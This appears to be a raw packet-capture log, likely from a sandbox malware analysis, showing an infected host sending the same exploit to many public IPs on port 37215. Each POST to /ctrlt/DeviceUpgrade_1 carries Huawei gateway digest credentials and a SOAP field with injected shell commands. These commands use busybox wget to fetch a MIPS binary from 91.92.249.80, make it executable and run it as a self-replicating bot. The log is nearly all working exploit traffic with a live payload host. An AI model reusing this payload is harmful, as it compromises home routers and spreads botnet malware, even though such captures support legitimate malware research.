                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1150192.168.2.2345990145.226.19.2137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.300029039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1151192.168.2.233638441.72.218.13337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.300036907 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1152192.168.2.2344348205.3.114.13337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.300050020 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1153192.168.2.2343688157.243.131.10237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.300056934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1154192.168.2.2338454157.150.235.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.300072908 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1155192.168.2.236050460.138.179.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.300080061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1156192.168.2.2353900197.9.3.8837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301111937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1157192.168.2.234316434.107.232.15937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301111937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1158192.168.2.233463060.221.130.10737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301126957 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1159192.168.2.234504062.222.132.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301148891 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1160192.168.2.2344532157.163.43.10337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.301150084 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
